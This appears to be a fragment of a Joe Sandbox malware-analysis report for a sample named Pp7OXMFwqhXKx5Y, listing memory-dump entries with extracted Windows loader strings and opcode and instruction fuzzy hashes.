                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                                                                  • API String ID: 0-118005554
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: .Local\$@
                                                                                                                                                                                                                                  • API String ID: 0-380025441
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 0151289A
                                                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0151289F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                                                                  • API String ID: 0-2653619699
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: GlobalTags
                                                                                                                                                                                                                                  • API String ID: 0-1106856819
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: #%u
                                                                                                                                                                                                                                  • API String ID: 0-232158463
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: EXT-
                                                                                                                                                                                                                                  • API String ID: 0-1948896318
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: BinaryHash
                                                                                                                                                                                                                                  • API String ID: 0-2202222882
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: verifier.dll
                                                                                                                                                                                                                                  • API String ID: 0-3265496382
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: #
                                                                                                                                                                                                                                  • API String ID: 0-1885708031
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015285DE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                                                                                                                  • API String ID: 0-702105204
Memory Dump Source
• Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3f4aad6611b31406eba6a6b72b263e271ac46949dc4935a8f0e7f00c9eaf6f70
                                                                                                                                                                                                                                  • Instruction ID: 695b9dbaf65bc911c0af6c89b6c31d32bb713a16b3158e50134f1721af1dda99
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f4aad6611b31406eba6a6b72b263e271ac46949dc4935a8f0e7f00c9eaf6f70
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5C168702083418FE765CF59C494BABB7E4FF98304F45496EE9898B2A1E774E904CF92
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 036d1cf6bd72de258f17eda8be44a8b0caf82808fec5c74bd61a6eb5ce33a7bc
                                                                                                                                                                                                                                  • Instruction ID: cb9fe522436c2cc0f0546acd039834786f6632b7bc07f7e93d2e76e2ec35438a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 036d1cf6bd72de258f17eda8be44a8b0caf82808fec5c74bd61a6eb5ce33a7bc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05B17170A002668BDB74DF59C890BAAB7F1EF54714F0485EED50AEB3A1DB309D85CB21
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 77a281c011a7098c006d8141ecb6173298c6d4fb2c8f63e2dbf0df6030c76bba
                                                                                                                                                                                                                                  • Instruction ID: 87635442ee78d424a695067f977e7f28cd3d3091cdccb7777494a4c7dc0150f5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77a281c011a7098c006d8141ecb6173298c6d4fb2c8f63e2dbf0df6030c76bba
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0A1E431E002159FEB32DBD9C848BAEBFA4BB14B14F05052BEA11BF2E1D7749945CB91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9a57e3f58834469790b1c79443b801ff5f1d17ce43467a174ac35737bec0bd67
                                                                                                                                                                                                                                  • Instruction ID: c8b479b07fb975db0483bf84703805e15329d47363d78a5f1fa857b5201f7e2e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a57e3f58834469790b1c79443b801ff5f1d17ce43467a174ac35737bec0bd67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CA1B074B006069FEB25DF69C994BBBB7F5FF54315F00402AE9259B2A1DBB4A805CB80
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3a9f13eb6d009e0f7644ec19c0ee56facbfd2b84385ed492b23f69991eced646
                                                                                                                                                                                                                                  • Instruction ID: 8bb083f2e18d667c386d093e009d98261547dfebd65d8c5fe9e0eb720ed01bc9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a9f13eb6d009e0f7644ec19c0ee56facbfd2b84385ed492b23f69991eced646
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8A1EB72604202EFC722DF28D981B6ABBE9FF68704F01092DE5899F661C374EC55CB91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 87f544659b89731933b6e0ca8a94c746eccb9fcc4d4afa94b58c44ebf73835ee
                                                                                                                                                                                                                                  • Instruction ID: 6b94b7374f75bdef2abef973d79ccb655053c3fe4378b42c15caf8bfaea59f4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87f544659b89731933b6e0ca8a94c746eccb9fcc4d4afa94b58c44ebf73835ee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D891F332A01615CBDB219BA9C4C0BFE7BB1FFD4718F05406AE905AF3A5D6389902C7B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a4cee4642f7b0ea42bf46be55bce08d9fb130d153189fe7391e376498ba48573
                                                                                                                                                                                                                                  • Instruction ID: 675c5fefe3c812e0ce400ca97f0699006ced06675e0dd27918a82540a8a4d816
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4cee4642f7b0ea42bf46be55bce08d9fb130d153189fe7391e376498ba48573
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86B112756093818FD764CF28C580A5BFBF1BB88704F18496EE999CB362D371E845CB42
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 273aba2697cc364f784fce8701bae0bb4d3653c9059d9158fceb6379c4c73ee2
                                                                                                                                                                                                                                  • Instruction ID: 179c7f70ccdba7f9f08d8e0a1f6de245506ba5389d8333d7c9e8c3d514d17855
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 273aba2697cc364f784fce8701bae0bb4d3653c9059d9158fceb6379c4c73ee2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2B19C759042068FDB25CF18D1887AABBF0BB2831CF56456BD8219F3A6D731D842CB91
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5cdbd06e7470278eb4dac0ddef6d0b1f9759f72009f2f42962409eae7fcfec0a
                                                                                                                                                                                                                                  • Instruction ID: e7a6e8417955dd0357240e9325fa593eec407696fffee0c87ed146cd038a89ea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cdbd06e7470278eb4dac0ddef6d0b1f9759f72009f2f42962409eae7fcfec0a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CA17871608342CFC321CF29C480A2BBBE5FFA8345F56496EE5858B361E731E945CB92
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7652b05ccdb3bb65cbc28f8444d229d14f844880892621322374e2c5b72769f8
                                                                                                                                                                                                                                  • Instruction ID: 262c4ba87c48328044fb21304dddac832f8a4cf0e4738e4322f710391bab7d8b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7652b05ccdb3bb65cbc28f8444d229d14f844880892621322374e2c5b72769f8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C810272A10315ABDB21DFA5CC84EAFBBFCFF55711F10052AE615AB1A1D6B0A900CB54
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                                                                                                  • Instruction ID: 0f7881eae7fc74fc304d6fa05a3f016ed3b3a238131b5e3363bec51f4054fa7a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bd6bb45f2ff03ac3460fc56b718573f81f2f6c7441370bccea4be0320480504
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68719031A0021A9BDFA0CF59C4A4ABEBBF7BF54650F56412BDD01AF242E734E941C7A0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c688f2b0c52710cb22b4962c6e40b46c99b8e4ffe871aaff9eb4c4dfe0ad514f
                                                                                                                                                                                                                                  • Instruction ID: d9b2b8a22eb0ee49e6a20720c94733d96e2aaf82ba97afaee9d914b6982c4dbd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c688f2b0c52710cb22b4962c6e40b46c99b8e4ffe871aaff9eb4c4dfe0ad514f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C816471A006099FDB26CFA9C890BEEB7F9FF48354F14452EE555AB220DB30AC45DB60
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 02e76b763d7c7e07601a3a974d37a63bd27d5f5e00b4ecf88ea22937af058e9c
                                                                                                                                                                                                                                  • Instruction ID: e7c9ff2a47c0d8d6ee009c2dbebf59d42357f6a0dd52a5ed3badc74a6cdeeb43
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02e76b763d7c7e07601a3a974d37a63bd27d5f5e00b4ecf88ea22937af058e9c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D571BCB4D04629DBCB268F99C9D0BFEBBB0FF48710F15411AE856AB390D7349805CBA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: d1700d949ed11ff21a944c7882af37ffeab66735628cc97d6a3d0d839e9dccc9
                                                                                                                                                                                                                                  • Instruction ID: 77fd35d77edb0fc003344388e3c96c91280766499c64eeeb988bd8b722d2ce9d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1700d949ed11ff21a944c7882af37ffeab66735628cc97d6a3d0d839e9dccc9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2671E1316042428FD312DF2DC490BAAB7E5FF94700F0585AAE859CB362DB74ED46CBA1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                                                                                                                                                                  • Instruction ID: b66e6ce9b4857ce862c2f4a1dda9b771034b4fac6487cd06a274afa65b779020
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 841ddc28af16eda66a065c12b7bbd1f33eb2c64351661267d32a9e5a5bf1116f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 905109762002139BEB12AFE98844ABF7BF5FFA4654F04082DF950CB214E674D806C7A2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8ecd2fe5060f952375e94f4e4a7b599a95571667b176af279d093844bc8bafa0
                                                                                                                                                                                                                                  • Instruction ID: eb4fbe7d6ab7779ec073ea00701cb040eab221fc3a4cfd41c58a594a0703eead
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecd2fe5060f952375e94f4e4a7b599a95571667b176af279d093844bc8bafa0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A741D2712406019BDF369F2AE891F2BBBA5FF60710F15842FEA199B371D7709801CB50
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b288cd9c110921306e6766b46c29264593091c4289db28b07d9fda65017e5fb9
                                                                                                                                                                                                                                  • Instruction ID: 7d6cba0c0e1c130fa6adb214006aa9e4c9ef67d2f27679041dbf41cc11cfc1bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b288cd9c110921306e6766b46c29264593091c4289db28b07d9fda65017e5fb9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D251E9B15003029BE731EF69DD80F6B77E9FBA4724F11062EE9214B2A5D770D805CBA6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: bff48a95f92ca863f5759414af5eec9ef937b7f8b6822fdad8b4c535cca36406
                                                                                                                                                                                                                                  • Instruction ID: 2a76f512c14c457262f5a7a25116ba1ceb4464d1517287ab58f5c0df63ffdf84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bff48a95f92ca863f5759414af5eec9ef937b7f8b6822fdad8b4c535cca36406
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B515C71200A05DFDB32DF69C9E0EAAB7F9FB24744F41042EE6569B261D730E941CB60
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b1053c694f16524720a5707063e10f75318b9228a9d51e70f51332fbf4f29358
